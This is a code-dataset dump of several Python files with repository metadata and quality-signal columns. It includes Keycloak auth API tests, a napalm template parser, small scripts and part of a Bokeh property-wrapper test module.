hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed723953fe1d49ebe0be1e4ba1f11492af23f1a5 | 11,097 | py | Python | tests/test_api/test_auth.py | guioliveirabh/rhub-api | e57de57719d16dc8cc16ca30933bf2fdc5519234 | [
"MIT"
] | 1 | 2022-02-17T11:45:13.000Z | 2022-02-17T11:45:13.000Z | tests/test_api/test_auth.py | guioliveirabh/rhub-api | e57de57719d16dc8cc16ca30933bf2fdc5519234 | [
"MIT"
] | null | null | null | tests/test_api/test_auth.py | guioliveirabh/rhub-api | e57de57719d16dc8cc16ca30933bf2fdc5519234 | [
"MIT"
] | null | null | null | import base64
from unittest.mock import ANY
import pytest
from rhub.auth.keycloak import KeycloakClient
from rhub.api import DEFAULT_PAGE_LIMIT
API_BASE = '/v0'
def test_token_create(client, keycloak_mock):
keycloak_mock.login.return_value = {'access_token': 'foobar'}
rv = client.post(
f'{API_BASE}/auth/token/create',
headers={
'Authorization': 'Basic ' + base64.b64encode(b'user:pass').decode(),
}
)
keycloak_mock.login.assert_called_with('user', 'pass')
assert rv.status_code == 200
assert rv.json == {'access_token': 'foobar'}
def test_me(client, keycloak_mock):
keycloak_mock.user_get.return_value = {
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
}
rv = client.get(
f'{API_BASE}/me',
headers={'Authorization': 'Bearer foobar'},
)
assert rv.status_code == 200
assert rv.json == {
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
'_href': ANY,
}
def test_list_users(client, keycloak_mock):
keycloak_mock.user_list.return_value = [{
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
}]
rv = client.get(
f'{API_BASE}/auth/user',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.user_list.assert_called_with({'first': 0, 'max': DEFAULT_PAGE_LIMIT})
assert rv.status_code == 200
assert rv.json == [{
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
'_href': ANY,
}]
def test_create_user(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
user_data = {'username': 'user', 'email': 'user@example.com'}
keycloak_mock.user_create.return_value = user_id
keycloak_mock.user_get.return_value = user_data | {'id': user_id}
rv = client.post(
f'{API_BASE}/auth/user',
headers={'Authorization': 'Bearer foobar'},
json=user_data,
)
keycloak_mock.user_create.assert_called_with(user_data)
keycloak_mock.user_get.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == user_data | {'id': user_id, '_href': ANY}
def test_get_user(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
user_data = {'username': 'user', 'email': 'user@example.com'}
keycloak_mock.user_get.return_value = user_data | {'id': user_id}
rv = client.get(
f'{API_BASE}/auth/user/{user_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.user_get.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == user_data | {'id': user_id, '_href': ANY}
def test_update_user(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
user_data = {'username': 'user', 'email': 'new-user@example.com'}
keycloak_mock.user_update.return_value = user_id
keycloak_mock.user_get.return_value = user_data | {'id': user_id}
rv = client.patch(
f'{API_BASE}/auth/user/{user_id}',
headers={'Authorization': 'Bearer foobar'},
json=user_data,
)
keycloak_mock.user_update.assert_called_with(user_id, user_data)
keycloak_mock.user_get.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == user_data | {'id': user_id, '_href': ANY}
def test_delete_user(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
keycloak_mock.user_delete.return_value = None
rv = client.delete(
f'{API_BASE}/auth/user/{user_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.user_delete.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == {}
def test_list_user_groups(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
keycloak_mock.user_group_list.return_value = [{'id': user_id, 'name': 'admin'}]
rv = client.get(
f'{API_BASE}/auth/user/{user_id}/groups',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.user_group_list.assert_called_with(user_id)
assert rv.status_code == 200
assert rv.json == [{'id': user_id, 'name': 'admin', '_href': ANY}]
def test_add_user_group(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
group_id = '00000000-0004-0003-0002-000000000001'
keycloak_mock.group_user_add.return_value = None
rv = client.post(
f'{API_BASE}/auth/user/{user_id}/groups',
headers={'Authorization': 'Bearer foobar'},
json={'id': group_id},
)
keycloak_mock.group_user_add.assert_called_with(user_id, group_id)
assert rv.status_code == 200
assert rv.json == {}
def test_delete_user_group(client, keycloak_mock):
user_id = '00000000-0000-0000-0000-000000000000'
group_id = '00000000-0004-0003-0002-000000000001'
keycloak_mock.group_user_remove.return_value = None
rv = client.delete(
f'{API_BASE}/auth/user/{user_id}/groups',
headers={'Authorization': 'Bearer foobar'},
json={'id': group_id},
)
keycloak_mock.group_user_remove.assert_called_with(user_id, group_id)
assert rv.status_code == 200
assert rv.json == {}
def test_list_groups(client, keycloak_mock):
keycloak_mock.group_list.return_value = [{
'id': '00000000-0000-0000-0000-000000000000',
'name': 'admin',
}]
rv = client.get(
f'{API_BASE}/auth/group',
headers={'Authorization': 'Bearer foobar'},
)
assert rv.status_code == 200
assert rv.json == [{
'id': '00000000-0000-0000-0000-000000000000',
'name': 'admin',
'_href': ANY,
}]
def test_create_group(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
group_data = {'name': 'admin'}
keycloak_mock.group_create.return_value = group_id
keycloak_mock.group_get.return_value = group_data | {'id': group_id}
rv = client.post(
f'{API_BASE}/auth/group',
headers={'Authorization': 'Bearer foobar'},
json=group_data,
)
keycloak_mock.group_create.assert_called_with(group_data)
keycloak_mock.group_get.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == group_data | {'id': group_id, '_href': ANY}
def test_get_group(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
group_data = {'name': 'admin'}
keycloak_mock.group_get.return_value = group_data | {'id': group_id}
rv = client.get(
f'{API_BASE}/auth/group/{group_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.group_get.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == group_data | {'id': group_id, '_href': ANY}
def test_update_group(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
group_data = {'name': 'new-admin'}
keycloak_mock.group_update.return_value = group_id
keycloak_mock.group_get.return_value = group_data | {'id': group_id}
rv = client.patch(
f'{API_BASE}/auth/group/{group_id}',
headers={'Authorization': 'Bearer foobar'},
json=group_data,
)
keycloak_mock.group_update.assert_called_with(group_id, group_data)
keycloak_mock.group_get.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == group_data | {'id': group_id, '_href': ANY}
def test_delete_group(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
keycloak_mock.group_delete.return_value = group_id
rv = client.delete(
f'{API_BASE}/auth/group/{group_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.group_delete.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == {}
def test_list_group_users(client, keycloak_mock):
group_id = '00000000-0004-0003-0002-000000000001'
user_data = {
'id': '00000000-0000-0000-0000-000000000000',
'username': 'user',
}
keycloak_mock.group_user_list.return_value = [user_data]
rv = client.get(
f'{API_BASE}/auth/group/{group_id}/users',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.group_user_list.assert_called_with(group_id)
assert rv.status_code == 200
assert rv.json == [user_data | {'_href': ANY}]
def test_list_roles(client, keycloak_mock):
keycloak_mock.role_list.return_value = [{
'id': '00000000-000d-000c-000b-00000000000a',
'name': 'admin',
}]
rv = client.get(
f'{API_BASE}/auth/role',
headers={'Authorization': 'Bearer foobar'},
)
assert rv.status_code == 200
assert rv.json == [{
'id': '00000000-000d-000c-000b-00000000000a',
'name': 'admin',
'_href': ANY,
}]
def test_create_role(client, keycloak_mock):
role_id = '00000000-000d-000c-000b-00000000000a'
role_data = {'name': 'admin'}
keycloak_mock.role_create.return_value = role_id
keycloak_mock.role_get.return_value = role_data | {'id': role_id}
rv = client.post(
f'{API_BASE}/auth/role',
headers={'Authorization': 'Bearer foobar'},
json=role_data,
)
keycloak_mock.role_create.assert_called_with(role_data)
keycloak_mock.role_get.assert_called_with(role_id)
assert rv.status_code == 200
assert rv.json == role_data | {'id': role_id, '_href': ANY}
def test_get_role(client, keycloak_mock):
role_id = '00000000-000d-000c-000b-00000000000a'
role_data = {'name': 'admin'}
keycloak_mock.role_get.return_value = role_data | {'id': role_id}
rv = client.get(
f'{API_BASE}/auth/role/{role_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.role_get.assert_called_with(role_id)
assert rv.status_code == 200
assert rv.json == role_data | {'id': role_id, '_href': ANY}
def test_update_role(client, keycloak_mock):
role_id = '00000000-000d-000c-000b-00000000000a'
role_data = {'name': 'new-admin'}
keycloak_mock.role_update.return_value = role_id
keycloak_mock.role_get.return_value = role_data | {'id': role_id}
rv = client.patch(
f'{API_BASE}/auth/role/{role_id}',
headers={'Authorization': 'Bearer foobar'},
json=role_data,
)
keycloak_mock.role_update.assert_called_with(role_id, role_data)
keycloak_mock.role_get.assert_called_with(role_data['name'])
assert rv.status_code == 200
assert rv.json == role_data | {'id': role_id, '_href': ANY}
def test_delete_role(client, keycloak_mock):
role_id = '00000000-000d-000c-000b-00000000000a'
keycloak_mock.role_delete.return_value = role_id
rv = client.delete(
f'{API_BASE}/auth/role/{role_id}',
headers={'Authorization': 'Bearer foobar'},
)
keycloak_mock.role_delete.assert_called_with(role_id)
assert rv.status_code == 200
assert rv.json == {}
| 28.093671 | 87 | 0.663963 | 1,465 | 11,097 | 4.731058 | 0.057338 | 0.124657 | 0.055403 | 0.054538 | 0.909681 | 0.858606 | 0.828452 | 0.807531 | 0.774491 | 0.741884 | 0 | 0.102256 | 0.19717 | 11,097 | 394 | 88 | 28.164975 | 0.675721 | 0 | 0 | 0.637363 | 0 | 0 | 0.232766 | 0.132198 | 0 | 0 | 0 | 0 | 0.241758 | 1 | 0.076923 | false | 0.007326 | 0.018315 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c23e782b202536af16f6631cc8e0cba828a2871 | 207 | py | Python | src/napalm_digineo_procurve/templates/parser.py | digineo/napalm-digineo-procurve | 477befcd09b0ce209c42f9742b2c4bb0986fceb8 | [
"Apache-2.0"
] | 4 | 2019-06-07T07:59:56.000Z | 2020-12-09T19:27:56.000Z | src/napalm_digineo_procurve/templates/parser.py | digineo/napalm-digineo-procurve | 477befcd09b0ce209c42f9742b2c4bb0986fceb8 | [
"Apache-2.0"
] | 1 | 2021-03-31T19:04:16.000Z | 2021-03-31T19:04:16.000Z | src/napalm_digineo_procurve/templates/parser.py | digineo/napalm-digineo-procurve | 477befcd09b0ce209c42f9742b2c4bb0986fceb8 | [
"Apache-2.0"
] | 1 | 2019-12-24T11:05:24.000Z | 2019-12-24T11:05:24.000Z | import napalm_digineo_procurve.templates.reader
def parse(raw_data: str, template_name: str):
t = napalm_digineo_procurve.templates.reader.read_template(template_name)
return t.ParseText(raw_data)
| 29.571429 | 77 | 0.811594 | 29 | 207 | 5.482759 | 0.586207 | 0.163522 | 0.264151 | 0.377358 | 0.45283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10628 | 207 | 6 | 78 | 34.5 | 0.859459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
9c296077eabfa8c6a760736fd5f26b850c632b11 | 86 | py | Python | chatrooms/youtube/config.py | Dogeek/ChatAggregator | c1cf700e2529d6bb78ce7e4850c532ef55841d85 | [
"MIT"
] | 3 | 2019-11-17T19:31:08.000Z | 2020-12-07T00:47:22.000Z | chatrooms/youtube/config.py | Dogeek/ChatAggregator | c1cf700e2529d6bb78ce7e4850c532ef55841d85 | [
"MIT"
] | 16 | 2019-11-17T19:48:02.000Z | 2019-11-24T02:49:44.000Z | chatrooms/youtube/config.py | Dogeek/ChatAggregator | c1cf700e2529d6bb78ce7e4850c532ef55841d85 | [
"MIT"
] | 3 | 2019-11-17T19:31:13.000Z | 2019-11-21T11:59:18.000Z | client_id = "925824295105-eck95gj8beboqih77p0r2aujtoui4ppj.apps.googleusercontent.com" | 86 | 86 | 0.895349 | 7 | 86 | 10.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238095 | 0.023256 | 86 | 1 | 86 | 86 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.827586 | 0.827586 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c3ff02c6e512338d8c4c66816f6ed48bc7a72e8 | 100 | py | Python | Anachebe Ikechukwu/Phase 1/Python Basic 1/Day 2/Qtn2.py | dreamchild7/python-challenges | 5d47df145da2613f756cf44a1e0cfe5fb0a49f35 | [
"MIT"
] | null | null | null | Anachebe Ikechukwu/Phase 1/Python Basic 1/Day 2/Qtn2.py | dreamchild7/python-challenges | 5d47df145da2613f756cf44a1e0cfe5fb0a49f35 | [
"MIT"
] | null | null | null | Anachebe Ikechukwu/Phase 1/Python Basic 1/Day 2/Qtn2.py | dreamchild7/python-challenges | 5d47df145da2613f756cf44a1e0cfe5fb0a49f35 | [
"MIT"
] | null | null | null | import sys
print("Python version")
print (sys.version)
print("Version info")
print(sys.version_info) | 20 | 23 | 0.78 | 15 | 100 | 5.133333 | 0.4 | 0.311688 | 0.38961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 100 | 5 | 24 | 20 | 0.836957 | 0 | 0 | 0 | 0 | 0 | 0.257426 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0.8 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
92c2a8b5da6b30f4fa1a1de39f9c41d48dc31ef5 | 42 | py | Python | mynewfile.py | jakelever/exampleproject | d0082efb495635ac6eea5aab92f1e77bfe4c3259 | [
"MIT"
] | null | null | null | mynewfile.py | jakelever/exampleproject | d0082efb495635ac6eea5aab92f1e77bfe4c3259 | [
"MIT"
] | null | null | null | mynewfile.py | jakelever/exampleproject | d0082efb495635ac6eea5aab92f1e77bfe4c3259 | [
"MIT"
] | null | null | null | print("Hello world")
print("Hello again")
| 14 | 20 | 0.714286 | 6 | 42 | 5 | 0.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 2 | 21 | 21 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0.52381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
92cfb114c5c5c04e62afe5a6573582a786996d4b | 162 | py | Python | asyncjobs/__init__.py | jherland/asyncjobs | 1be027cab39f2ad3451766135100be7fe07b9386 | [
"MIT"
] | 1 | 2020-11-24T03:43:12.000Z | 2020-11-24T03:43:12.000Z | asyncjobs/__init__.py | jherland/asyncjobs | 1be027cab39f2ad3451766135100be7fe07b9386 | [
"MIT"
] | null | null | null | asyncjobs/__init__.py | jherland/asyncjobs | 1be027cab39f2ad3451766135100be7fe07b9386 | [
"MIT"
] | 2 | 2020-11-24T03:42:53.000Z | 2021-10-09T08:26:54.000Z | from . import polyfill # noqa: F401
from . import external_work, signal_handling
class Scheduler(external_work.Scheduler, signal_handling.Scheduler):
pass
| 23.142857 | 68 | 0.790123 | 20 | 162 | 6.2 | 0.6 | 0.16129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021583 | 0.141975 | 162 | 6 | 69 | 27 | 0.870504 | 0.061728 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
92dd8b8b98ba0745b06799c1d866562b62797bb8 | 61 | py | Python | cotidia/cms/tests/__init__.py | guillaumepiot/cotidia-cms | 178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b | [
"BSD-3-Clause"
] | null | null | null | cotidia/cms/tests/__init__.py | guillaumepiot/cotidia-cms | 178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b | [
"BSD-3-Clause"
] | null | null | null | cotidia/cms/tests/__init__.py | guillaumepiot/cotidia-cms | 178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b | [
"BSD-3-Clause"
] | null | null | null | from .page import *
from .api import *
from .dataset import * | 20.333333 | 22 | 0.721311 | 9 | 61 | 4.888889 | 0.555556 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.180328 | 61 | 3 | 22 | 20.333333 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
92e70db5b5168ea52094ce71b6e6a88ae2c1d593 | 17,581 | py | Python | tests/unit/bokeh/core/property/test_wrappers__property.py | asellappen/bokeh | e003b82b18c8ee7fb36f23c5f877e5e16b792827 | [
"BSD-3-Clause"
] | null | null | null | tests/unit/bokeh/core/property/test_wrappers__property.py | asellappen/bokeh | e003b82b18c8ee7fb36f23c5f877e5e16b792827 | [
"BSD-3-Clause"
] | null | null | null | tests/unit/bokeh/core/property/test_wrappers__property.py | asellappen/bokeh | e003b82b18c8ee7fb36f23c5f877e5e16b792827 | [
"BSD-3-Clause"
] | null | null | null | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# External imports
from mock import patch
# Bokeh imports
from bokeh._testing.util.api import verify_all
from bokeh.core.properties import (
Angle,
Any,
Bool,
Color,
ColumnData,
Complex,
DashPattern,
Dict,
Either,
Enum,
Float,
Instance,
Int,
Interval,
List,
MinMaxBounds,
Percent,
Regex,
Seq,
Size,
String,
Tuple,
)
from bokeh.models import ColumnDataSource
# Module under test
import bokeh.core.property.wrappers as bcpw # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
ALL = (
'notify_owner',
'PropertyValueContainer',
'PropertyValueList',
'PropertyValueDict',
'PropertyValueColumnData',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
def test_notify_owner() -> None:
result = {}
class Foo:
@bcpw.notify_owner
def test(self): pass
def _notify_owners(self, old):
result['old'] = old
def _saved_copy(self): return "foo"
f = Foo()
f.test()
assert result['old'] == 'foo'
assert f.test.__doc__ == "Container method ``test`` instrumented to notify property owners"
def test_PropertyValueContainer() -> None:
pvc = bcpw.PropertyValueContainer()
assert pvc._owners == set()
pvc._register_owner("owner", "prop")
assert pvc._owners == {("owner", "prop")}
pvc._unregister_owner("owner", "prop")
assert pvc._owners == set()
with pytest.raises(RuntimeError):
pvc._saved_copy()
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueDict_mutators(mock_notify) -> None:
pvd = bcpw.PropertyValueDict(dict(foo=10, bar=20, baz=30))
mock_notify.reset_mock()
del pvd['foo']
assert mock_notify.called
mock_notify.reset_mock()
pvd['foo'] = 11
assert mock_notify.called
mock_notify.reset_mock()
pvd.pop('foo')
assert mock_notify.called
mock_notify.reset_mock()
pvd.popitem()
assert mock_notify.called
mock_notify.reset_mock()
pvd.setdefault('baz')
assert mock_notify.called
mock_notify.reset_mock()
pvd.clear()
assert mock_notify.called
mock_notify.reset_mock()
pvd.update(bar=1)
assert mock_notify.called
@patch('bokeh.core.property.descriptors.ColumnDataPropertyDescriptor._notify_mutated')
def test_PropertyValueColumnData___setitem__(mock_notify) -> None:
from bokeh.document.events import ColumnDataChangedEvent
source = ColumnDataSource(data=dict(foo=[10], bar=[20], baz=[30]))
pvcd = bcpw.PropertyValueColumnData(source.data)
pvcd._register_owner(source, source.lookup('data'))
mock_notify.reset_mock()
pvcd['foo'] = [11]
assert pvcd == dict(foo=[11], bar=[20], baz=[30])
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == (source, dict(foo=[10], bar=[20], baz=[30]))
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnDataChangedEvent)
assert mock_notify.call_args[1]['hint'].column_source == source
assert mock_notify.call_args[1]['hint'].cols == ['foo']
@patch('bokeh.core.property.descriptors.ColumnDataPropertyDescriptor._notify_mutated')
def test_PropertyValueColumnData_update(mock_notify) -> None:
from bokeh.document.events import ColumnDataChangedEvent
source = ColumnDataSource(data=dict(foo=[10], bar=[20], baz=[30]))
pvcd = bcpw.PropertyValueColumnData(source.data)
pvcd._register_owner(source, source.lookup('data'))
mock_notify.reset_mock()
pvcd.update(foo=[11], bar=[21])
assert pvcd == dict(foo=[11], bar=[21], baz=[30])
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == (source, dict(foo=[10], bar=[20], baz=[30]))
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnDataChangedEvent)
assert mock_notify.call_args[1]['hint'].column_source == source
assert sorted(mock_notify.call_args[1]['hint'].cols) == ['bar', 'foo']
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_list_to_list(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
source = ColumnDataSource(data=dict(foo=[10]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[20]), setter="setter")
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [10, 20]},) # streaming to list, "old" is actually updated value
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == None
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_list_to_array(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
import numpy as np
source = ColumnDataSource(data=dict(foo=np.array([10])))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[20]), setter="setter")
